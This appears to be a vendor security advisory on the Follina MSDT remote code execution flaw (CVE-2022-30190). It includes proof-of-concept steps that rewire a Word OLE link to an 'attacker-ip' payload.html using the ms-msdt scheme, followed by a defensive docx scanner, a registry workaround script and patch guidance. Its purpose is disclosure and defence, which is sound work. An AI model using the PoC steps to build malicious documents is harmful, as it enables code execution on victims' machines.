Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)

Security researchers have discovered a new zero-day vulnerability in Microsoft Office, via Microsoft Support Diagnostic Tool (MSDT), that could be exploited to achieve code execution on affected systems simply by opening a malicious Word document. 
  
The vulnerability, tracked as CVE-2022-30190, was discovered by the Japanese security researcher nao_sec, who tweeted a warning about the zero-day over the weekend. Security researcher Kevin Beaumont named the vulnerability “Follina” because the spotted sample’s file name references 0438, which is the area code of Follina in Italy.
 
Description 
 
This remote code execution vulnerability (CVE-2022-30190) exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this flaw can execute arbitrary code with the calling application’s privileges. 
 
Security researcher nao_sec found a malicious Word document submitted to the VirusTotal scanning platform from an IP address in Belarus. “Interesting maldoc was submitted from Belarus. It uses Word’s external link to load the HTML and then uses the ‘ms-msdt’ scheme to execute PowerShell code,” he tweeted.
 
[Screenshot. Image source: nao_sec]
 
Security researcher Kevin Beaumont has explained in a blog post that the document uses the Word remote template feature to retrieve an HTML file from a remote web server. This file uses the ms-msdt MSProtocol URL scheme to load some code and execute PowerShell commands.  
 
[Screenshot. Image source: Kevin Beaumont]
 
The Protected View function in Microsoft Office does activate to warn users of the possibility of a malicious document, according to the researcher. However, by converting the document to a Rich Text Format (RTF) file, the exploit runs without even opening the document.  
 
Steps for PoC replication 
 
MS Office docx files may contain external OLE object references to HTML files. The HTML scheme “ms-msdt:” calls up the msdt diagnostic tool, which can run arbitrary code without the use of macros.
 
Here are the steps to build a Proof-of-Concept docx:

  • Create a Word document, insert an (OLE) object as a Bitmap Image and save it as a docx file.
  • Edit word/_rels/document.xml.rels in the docx structure using a file archiver such as 7-Zip.

[Screenshot. Image source: Qualys Labs]

  • Modify the XML tag <Relationship> with attribute Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" and Target="embeddings/oleObject1.bin" by changing the Target value and adding the attribute TargetMode as follows: 

Target = "http://attacker-ip/payload.html!" 
TargetMode = "External" 
 
Note the Id value (probably it is “rId5”). 
 
[Screenshot. Image source: Qualys Labs]

  • Edit word/document.xml. Search for the <o:OLEObject …> tag (with r:id="rId5") and change the attribute from Type="Embed" to Type="Link", then add the attribute UpdateMode="OnCall".

[Screenshot. Image source: Qualys Labs]

  • Serve the PoC html payload with the ms-msdt scheme at http://<payload_server>/payload.html:

Note: The comment line with AAA should be repeated multiple times to fill up enough space to trigger the payload.  
 
[Screenshot. Image source: Qualys Labs]
 
The Word document causes the victim system to send a request to the attacker’s IP for payload.html. The following Apache logs show the request for payload.html.

[Screenshot. Image source: Qualys Labs]
 
This results in the victim system executing the PowerShell command defined within payload.html, and thereby arbitrary code of the attacker’s choice.
 
[Screenshot. Image source: Qualys Labs]
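The replication steps above change two parts inside the docx package: an oleObject relationship in word/_rels/document.xml.rels gains TargetMode="External" with an HTTP Target, and the matching <o:OLEObject> in word/document.xml is switched from Type="Embed" to Type="Link" with UpdateMode="OnCall". Those are exactly the indicators a mail gateway or triage script can look for without ever resolving the link. The scanner below is an added example written for this post; it is not Qualys’ QID logic and not the PoC. It assumes standard OOXML namespaces and builds a constructed, incomplete fixture (only the two parts the scanner reads, with a placeholder host that does not resolve) so it can be exercised offline.

```python
"""Scan .docx files for the external OLE link indicators of CVE-2022-30190.

Added example, not Qualys' QID logic and not the PoC. It reads the two OOXML
parts the replication steps modify and reports (1) oleObject relationships
whose Target is external, (2) OLEObject tags switched to Type="Link", and
(3) any part carrying the ms-msdt: scheme. Nothing is fetched from the network.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET  # for hostile input, prefer defusedxml

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
O_NS = "urn:schemas-microsoft-com:office:office"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
RELS_PART = "word/_rels/document.xml.rels"
DOC_PART = "word/document.xml"


def scan_docx(data: bytes) -> list[str]:
    """Return one finding string per indicator; an empty list means clean."""
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        external: dict[str, str] = {}  # rId -> Target for external oleObject rels
        if RELS_PART in names:
            rels_root = ET.fromstring(z.read(RELS_PART))
            for rel in rels_root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    external[rel.get("Id", "")] = rel.get("Target", "")
                    findings.append(f"rels: oleObject {rel.get('Id')} is External -> {rel.get('Target')}")
        if DOC_PART in names:
            doc_root = ET.fromstring(z.read(DOC_PART))
            for ole in doc_root.iter(f"{{{O_NS}}}OLEObject"):
                rid = ole.get(f"{{{R_NS}}}id", "")
                if ole.get("Type") == "Link":
                    where = "external target" if rid in external else "package-internal target"
                    findings.append(
                        f"document: OLEObject {rid} Type=Link UpdateMode={ole.get('UpdateMode')} ({where})")
        # The HTML normally lives off-host, but a docx carrying the scheme itself is a red flag too.
        for name in sorted(names):
            if b"ms-msdt:" in z.read(name):
                findings.append(f"{name}: contains ms-msdt: scheme")
    return findings


def build_sample_docx(linked: bool) -> bytes:
    """Constructed fixture containing only the two parts the scanner reads (it is
    not a complete Word file): a plain embedded OLE object, or the same object
    rewired as the steps describe, pointing at a placeholder host."""
    if linked:
        rel_attrs = 'Target="http://placeholder.invalid/page.html" TargetMode="External"'
        ole_attrs = 'Type="Link" UpdateMode="OnCall"'
    else:
        rel_attrs = 'Target="embeddings/oleObject1.bin"'
        ole_attrs = 'Type="Embed"'
    rels = (f'<Relationships xmlns="{PKG_NS}">'
            f'<Relationship Id="rId5" Type="{OLE_REL}" {rel_attrs}/></Relationships>')
    doc = (f'<w:document xmlns:w="{W_NS}" xmlns:r="{R_NS}" xmlns:o="{O_NS}"><w:body><w:p><w:r>'
           f'<w:object><o:OLEObject {ole_attrs} ProgID="Package" ObjectID="_1" r:id="rId5"/>'
           f'</w:object></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(RELS_PART, rels)
        z.writestr(DOC_PART, doc)
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) == 1:
        for label, flag in (("benign", False), ("linked", True)):
            print(label, scan_docx(build_sample_docx(flag)))
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan_docx(fh.read()))
```

Run it with one or more .docx paths to scan real files, or with no arguments to see the two fixtures. Converting the sample to RTF, as the post notes, changes the container, so RTF files need a separate check; this scanner covers the docx package only.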
 
Workaround 
 
Microsoft has recommended disabling the MSDT URL protocol as a temporary fix. Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. The following steps can be taken to disable the MSDT protocol.

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

How to mitigate the risk until the vulnerability is remediated

1. Workaround/Mitigation Detection

Qualys Policy Compliance customers can evaluate the workaround using the following control: Control 24074, Status of the ‘Microsoft Support Diagnostic Tool (MSDT)’ service.

2. Executing the workaround using Qualys CAR
Qualys Custom Assessment and Remediation (CAR) customers can apply the mitigation steps above by creating a PowerShell script and executing it on the vulnerable assets.


How to undo the workaround 

  1. Run Command Prompt as Administrator.
  2. To restore the registry key from the backup, execute the command “reg import filename”
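The workaround and its undo both rely on the exported .reg file: if the export failed or captured the wrong key, deleting HKEY_CLASSES_ROOT\ms-msdt leaves nothing to import later. The script below is an added example, not Qualys’ CAR script and not Microsoft tooling; it wraps the reg.exe commands from both procedures and refuses to delete the key until the exported backup has been checked. It assumes reg.exe is on the path and an elevated prompt on Windows; the sample export text is constructed and the exact values on a real host depend on the Windows build.

```python
"""Apply, verify and undo the ms-msdt URL protocol workaround for CVE-2022-30190.

Added example, not Qualys' CAR script or Microsoft tooling. It wraps the
reg.exe commands from the workaround steps (export, delete) and the undo step
(import), and will not delete the key until the exported backup has been
checked. Run from an Administrator prompt on Windows.
"""
import subprocess
import sys
from pathlib import Path

MSDT_KEY = r"HKEY_CLASSES_ROOT\ms-msdt"
REG_HEADER = "Windows Registry Editor Version 5.00"

# Constructed sample of what `reg export HKEY_CLASSES_ROOT\ms-msdt` can write;
# the handler command and values on a real host depend on the Windows build.
SAMPLE_EXPORT = "\r\n".join([
    REG_HEADER,
    "",
    "[HKEY_CLASSES_ROOT\\ms-msdt]",
    '@="URL:ms-msdt"',
    '"URL Protocol"=""',
    "",
    "[HKEY_CLASSES_ROOT\\ms-msdt\\shell\\open\\command]",
    '@="\\"C:\\\\WINDOWS\\\\system32\\\\msdt.exe\\" %1"',
    "",
])


def exported_keys(reg_text: str) -> list[str]:
    """Return the [KEY] section names found in a .reg file's text."""
    return [line[1:-1] for line in reg_text.splitlines()
            if line.startswith("[") and line.endswith("]")]


def backup_is_usable(reg_text: str) -> bool:
    """Only a real .reg export that contains the ms-msdt key itself is
    worth deleting the live key for."""
    lines = reg_text.splitlines()
    if not lines or lines[0].strip() != REG_HEADER:
        return False
    return any(k.lower() == MSDT_KEY.lower() for k in exported_keys(reg_text))


def read_reg_file(path: Path) -> str:
    """reg.exe writes UTF-16LE with a BOM on current Windows builds."""
    raw = path.read_bytes()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def _reg(*args: str) -> subprocess.CompletedProcess:
    if sys.platform != "win32":
        raise RuntimeError("reg.exe is only available on Windows")
    return subprocess.run(["reg", *args], capture_output=True, text=True)


def protocol_registered() -> bool:
    """`reg query` exits non-zero when the key does not exist."""
    return _reg("query", MSDT_KEY).returncode == 0


def apply_workaround(backup: Path) -> None:
    """Workaround steps 2 and 3: export, verify the export, then delete."""
    res = _reg("export", MSDT_KEY, str(backup), "/y")
    if res.returncode != 0:
        raise RuntimeError(f"reg export failed: {res.stderr.strip()}")
    if not backup_is_usable(read_reg_file(backup)):
        raise RuntimeError(f"{backup} does not contain {MSDT_KEY}; key not deleted")
    res = _reg("delete", MSDT_KEY, "/f")
    if res.returncode != 0:
        raise RuntimeError(f"reg delete failed: {res.stderr.strip()}")


def undo_workaround(backup: Path) -> None:
    """Undo step 2: import the saved key back."""
    if not backup_is_usable(read_reg_file(backup)):
        raise RuntimeError(f"{backup} is not a usable ms-msdt backup")
    res = _reg("import", str(backup))
    if res.returncode != 0:
        raise RuntimeError(f"reg import failed: {res.stderr.strip()}")


if __name__ == "__main__":
    # usage: msdt_workaround.py [apply|undo] [backup.reg]
    action = sys.argv[1] if len(sys.argv) > 1 else "apply"
    backup_path = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("ms-msdt-backup.reg")
    undo_workaround(backup_path) if action == "undo" else apply_workaround(backup_path)
    print("ms-msdt handler registered:", protocol_registered())
```

The final print is the check a practitioner wants after either action: the handler should be absent after applying the workaround and present again after the undo. The backup check is deliberately strict on the header and key name so that a zero-byte or truncated export is caught before the delete.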

Mitigation
On Tuesday, June 14, 2022, Microsoft issued Windows updates to address this vulnerability. In a post on the Microsoft Security Response Center, Microsoft recommends installing the updates as soon as possible. For more information, please refer to the Microsoft Security Advisory.
 
Qualys Detection  
Qualys customers can scan their devices with QID 91909 to detect vulnerable assets.  

QID 91909 was updated on June 14, 2022, after Microsoft released the patch to fix the zero-day vulnerability. This QID checks for patches only. QID 45538 is an information-gathering QID that checks whether the workaround for the vulnerability has been applied.

Continue to follow Qualys Threat Protection for more coverage on the latest vulnerabilities.  
  
References 
https://gist.github.com/tothi/66290a42896a97920055e50128c9f040  
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e 
https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/  
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ 
